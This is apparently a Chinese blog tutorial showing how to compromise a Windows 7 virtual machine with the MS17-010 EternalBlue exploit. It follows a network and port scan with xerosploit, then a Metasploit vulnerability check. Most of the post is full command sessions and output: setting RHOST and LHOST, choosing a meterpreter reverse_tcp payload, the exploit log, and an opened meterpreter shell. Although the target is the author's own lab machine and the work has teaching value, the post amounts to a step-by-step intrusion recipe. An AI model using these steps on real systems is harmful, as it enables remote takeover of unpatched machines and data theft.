使用永恒之蓝(MS17-010)漏洞入侵windows7

永恒之蓝简介

前几天,被勒索病毒(Wannacry)刷屏了,这个病毒是大家知道了备份文件的重要性,当然,我是不怕什么病毒的,因为我是一天备份一次文件,而且微云一份,坚果云,移动硬盘一份,就算被黑了又能怎样,最多花个一天时间装个系统,配置一下系统。而且我是不用垃圾windows的,linux百毒不侵,而且我的系统是天天更新。所以说被黑了一半的原因在于自己真的没有意识,都2017年了,还把文件放在本地电脑硬盘上,什么心态。Mother Fuck 话题扯远了,wannacry是利用永恒之蓝漏洞做的,所以说你只要不开放局域网网络共享,也就是不开放445端口就没有你的什么事情了

顺便说一下wannacry的汉化,我操,真的是贴心,可以说是2017最佳汉化程序,如果做steam游戏的厂商用做病毒的心态去做,还怕我们中国玩家差评?不存在的

渗透测试环境搭建

首先安装一台虚拟x64的windows7然后按照下面一步一步打开网络共享 点击 文件管理器->网络然后

点击网络发现 和文件共享已关闭..........

点击启用网络共享

点击是

看到上面这样子,就是成功了 注意网络最好是桥接的 之后这台虚拟机就可以不用理它了,开着就好

开始入侵

首先更新一下metasploit msfupdate 注意,最新版本的metasploit会提示 msfupdate is no longer supported when Metasploit is part of the operating system. Please use 'apt update; apt install metasploit-framework' 无所谓啦,你输入apt update && apt install metasploit-framework更新系统也没有事情的 之后扫描一下局域网内的机器 我喜欢用xerosploit扫描局域网,因为方便,如果不知道怎么安装和使用的同学,可以看我这篇博客 http://www.bboysoul.cn/2017/07/01/%E4%B8%AD%E9%97%B4%E4%BA%BA%E6%94%BB%E5%87%BB%E5%B7%A5%E5%85%B7(Xerosploit)/ 操作看下面

root@kali:~# xerosploit


██╗  ██╗███████╗██████╗  ██████╗ ███████╗██████╗ ██╗      ██████╗ ██╗████████╗
╚██╗██╔╝██╔════╝██╔══██╗██╔═══██╗██╔════╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
 ╚███╔╝ █████╗  ██████╔╝██║   ██║███████╗██████╔╝██║     ██║   ██║██║   ██║   
 ██╔██╗ ██╔══╝  ██╔══██╗██║   ██║╚════██║██╔═══╝ ██║     ██║   ██║██║   ██║   
██╔╝ ██╗███████╗██║  ██║╚██████╔╝███████║██║     ███████╗╚██████╔╝██║   ██║   
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝ ╚══════╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝                                                      


[+]═══════════[ Author : @LionSec1 _-\|/-_ Website: lionsec.net ]═══════════[+]

                      [ Powered by Bettercap and Nmap ]
 
┌═════════════════════════════════════════════════════════════════════════════┐
█                                                                             █
█                         Your Network Configuration                          █ 
█                                                                             █
└═════════════════════════════════════════════════════════════════════════════┘     
 
╒═══════════════╤═══════════════════╤═════════════╤═════════╤════════════╕
│  IP Address   │    MAC Address    │   Gateway   │  Iface  │  Hostname  │
╞═══════════════╪═══════════════════╪═════════════╪═════════╪════════════╡
│               │                   │             │         │            │
├───────────────┼───────────────────┼─────────────┼─────────┼────────────┤
│ 192.168.1.106 │ 08:00:27:7B:3D:E7 │ 192.168.1.1 │  eth0   │    kali    │
╘═══════════════╧═══════════════════╧═════════════╧═════════╧════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║             ║ XeroSploit is a penetration testing toolkit whose goal is to       ║
║ Information ║ perform man in the middle attacks for testing purposes.            ║
║             ║ It brings various modules that allow to realise efficient attacks. ║
║             ║ This tool is Powered by Bettercap and Nmap.                        ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮ scan

[++] Mapping your network ... 

[+]═══════════[ Devices found on your network ]═══════════[+]

╔═══════════════╦═══════════════════╦════════════════════════════════╗
║ IP Address    ║ Mac Address       ║ Manufacturer                   ║
╠═══════════════╬═══════════════════╬════════════════════════════════╣
║ 192.168.1.1   ║ 6C:59:40:EB:2C:E4 ║ (Shenzhen MercuryCommunication ║
║ 192.168.1.100 ║ B8:27:EB:CE:05:C6 ║ (Raspberry PiFoundation)       ║
║ 192.168.1.105 ║ 7C:DD:90:DE:A1:34 ║ (Shenzhen OgemrayTechnology)   ║
║ 192.168.1.107 ║ 08:00:27:B3:74:87 ║ (Oracle VirtualBoxvirtual      ║
║ 192.168.1.106 ║ 08:00:27:7B:3D:E7 ║ (This device)                  ║
║               ║                   ║                                ║
╚═══════════════╩═══════════════════╩════════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.

Xero ➮ 192.168.1.107

[++] 192.168.1.107 has been targeted. 

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ pscan
 
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         Port Scanner                         █
█                                                              █
█      Find open ports on network computers and retrieve       █
█     versions of programs running on the detected ports       █
└══════════════════════════════════════════════════════════════┘     

[+] Enter 'run' to execute the 'pscan' command.

Xero»modules»pscan ➮ run

[++] Please wait ... Scanning ports on 192.168.1.107 

[+]═════════[ Port scan result for 192.168.1.107 ]═════════[+]

╔══════════════╦══════════╦═══════╗
║ SERVICE      ║ PORT     ║ STATE ║
╠══════════════╬══════════╬═══════╣
║ MSRPC        ║ 135/TCP  ║ OPEN  ║
║ NETBIOS-SSN  ║ 139/TCP  ║ OPEN  ║
║ MICROSOFT-DS ║ 445/TCP  ║ OPEN  ║
║ WSDAPI       ║ 5357/TCP ║ OPEN  ║
║              ║          ║       ║
╚══════════════╩══════════╩═══════╝

[+] Enter 'run' to execute the 'pscan' command.

Xero»modules»pscan ➮ 

首先看到局域网内有5台电脑,第一台是我的路由器,第二台是我的树莓派,第三台是我的主电脑,第四台是windows7虚拟机,第五台是我的kali虚拟的 扫描一下windows7虚拟机,确认445端口是开放的 然后打开meatsploit攻击,操作看下面

root@kali:~# msfconsole
                                                  

                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .


       =[ metasploit v4.14.27-dev                         ]
+ -- --=[ 1659 exploits - 951 auxiliary - 293 post        ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search ms17-010
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                      Disclosure Date  Rank     Description
   ----                                      ---------------  ----     -----------
   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption


msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.107
rhosts => 192.168.1.107
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.1.107    yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > run

[+] 192.168.1.107:445     - Host is likely VULNERABLE to MS17-010!  (Windows 7 Ultimate 7601 Service Pack 1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.107
rhost => 192.168.1.107
msf exploit(ms17_010_eternalblue) > set payload windows/x64/
set payload windows/x64/exec                            set payload windows/x64/meterpreter/reverse_winhttps    set payload windows/x64/vncinject/bind_ipv6_tcp
set payload windows/x64/loadlibrary                     set payload windows/x64/powershell_bind_tcp             set payload windows/x64/vncinject/bind_ipv6_tcp_uuid
set payload windows/x64/meterpreter/bind_ipv6_tcp       set payload windows/x64/powershell_reverse_tcp          set payload windows/x64/vncinject/bind_tcp
set payload windows/x64/meterpreter/bind_ipv6_tcp_uuid  set payload windows/x64/shell/bind_ipv6_tcp             set payload windows/x64/vncinject/bind_tcp_uuid
set payload windows/x64/meterpreter/bind_tcp            set payload windows/x64/shell/bind_ipv6_tcp_uuid        set payload windows/x64/vncinject/reverse_http
set payload windows/x64/meterpreter/bind_tcp_uuid       set payload windows/x64/shell/bind_tcp                  set payload windows/x64/vncinject/reverse_https
set payload windows/x64/meterpreter/reverse_http        set payload windows/x64/shell/bind_tcp_uuid             set payload windows/x64/vncinject/reverse_tcp
set payload windows/x64/meterpreter/reverse_https       set payload windows/x64/shell/reverse_tcp               set payload windows/x64/vncinject/reverse_tcp_uuid
set payload windows/x64/meterpreter/reverse_tcp         set payload windows/x64/shell/reverse_tcp_uuid          set payload windows/x64/vncinject/reverse_winhttp
set payload windows/x64/meterpreter/reverse_tcp_uuid    set payload windows/x64/shell_bind_tcp                  set payload windows/x64/vncinject/reverse_winhttps
set payload windows/x64/meterpreter/reverse_winhttp     set payload windows/x64/shell_reverse_tcp               
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.1.107    yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > ifconfig
[*] exec: ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.106  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::a00:27ff:fe7b:3de7  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:7b:3d:e7  txqueuelen 1000  (Ethernet)
        RX packets 4305  bytes 483899 (472.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11338  bytes 2843116 (2.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 8  bytes 396 (396.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8  bytes 396 (396.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.106
lhost => 192.168.1.106
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.1.107    yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.106    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.106:4444 
[*] 192.168.1.107:445 - Connecting to target for exploitation.
[+] 192.168.1.107:445 - Connection established for exploitation.
[+] 192.168.1.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.107:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.1.107:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.1.107:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.1.107:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.1.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.107:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.107:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.107:445 - Starting non-paged pool grooming
[+] 192.168.1.107:445 - Sending SMBv2 buffers
[+] 192.168.1.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.107:445 - Sending final SMBv2 buffers.
[*] 192.168.1.107:445 - Sending last fragment of exploit packet!
[*] 192.168.1.107:445 - Receiving response from exploit packet
[+] 192.168.1.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.107:445 - Sending egg to corrupted connection.
[*] 192.168.1.107:445 - Triggering free of corrupted buffer.
[*] Sending stage (1189423 bytes) to 192.168.1.107
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.107:49159) at 2017-07-02 04:15:38 -0400
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 

首先我打开了metasploit,然后搜索了一下metasploit中和ms17-010相关的东西,发现有一个辅助模块和一个利用模块,然后我用辅助模块探测了我这台windows 7有没有ms17-010的漏洞,显示 [+] 192.168.1.107:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1) 表示目标系统有此漏洞,之后我用利用模块,然后再加载了一个后门载荷,设置了目标的ip和后门载荷所需要的本地ip之后执行exploit,成功拿到session

注意此攻击利用模块和后门载荷只对x64的系统有效。

Have fun

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏大魏分享(微信公众号:david-share)

怎样一个金箍圈(Pipeline),让至尊宝(Openshift)完成了到孙悟空(DevOps)的蜕变

但说出这句话,和实现Devops全工具链落地之间的差距,与造出原子弹和E=MC2公式的差距,实不逞多让。

6344
来自专栏阿杜的世界

在Spring Boot项目中使用Spock框架

Spock框架是基于Groovy语言的测试框架,Groovy与Java具备良好的互操作性,因此可以在Spring Boot项目中使用该框架写优雅、高效以及DSL...

2961
来自专栏别先生

实验手册——搜狗搜索日志分析系统

前奏:请提前搭建好你的集群和必要的软件:hadoop + jdk + hive + Sqoop + HBase; 数据(链接是网友的,感谢,感谢,感谢。里面有测...

1.4K8
来自专栏A周立SpringCloud

使用Spring Cloud Feign上传文件

最近经常有人问Spring Cloud Feign如何上传文件。有团队的新成员,也有其他公司的兄弟。本文简单做个总结—— 早期的Spring Cloud中,Fe...

4109
来自专栏耕耘实录

找回win7桌面IE图标我有绝招

现在很多同学都用了微软的新一代操作系统Windows7,都为Windows7的华丽界面及更人性化得操作所深深吸引,但是由于我们大多数同学都习惯了原来的Windo...

3125
来自专栏微信音视频小程序

教你1天搭建自己的“微视”

A simple iOS Application project is shown below to illustrate how to configure S...

1K5
来自专栏乐沙弥的世界

ORA-27090 故障一例

    最近的alert日志中碰到了ORA-27090的错误信息,其错误提示为Unable to reserve kernel resources for as...

762
来自专栏数据和云

实践真知:使用ASM和文件系统的数据库在AIO上有何不同?

张大朋(Lunar)Oracle 资深技术专家 Lunar 拥有超过十年的 ORACLE SUPPORT 从业经验,曾经服务于ORACLE ACS部门,现就职...

2984
来自专栏Objective-C

iOS-安装和使用 CocoaPods

4837
来自专栏Android中高级开发

Android开发之漫漫长途 IX——彻底掌握Binder

该文章是一个系列文章,是本人在Android开发的漫漫长途上的一点感想和记录,我会尽量按照先易后难的顺序进行编写该系列。该系列引用了《Android开发艺术探索...

1172

扫码关注云+社区

领取腾讯云代金券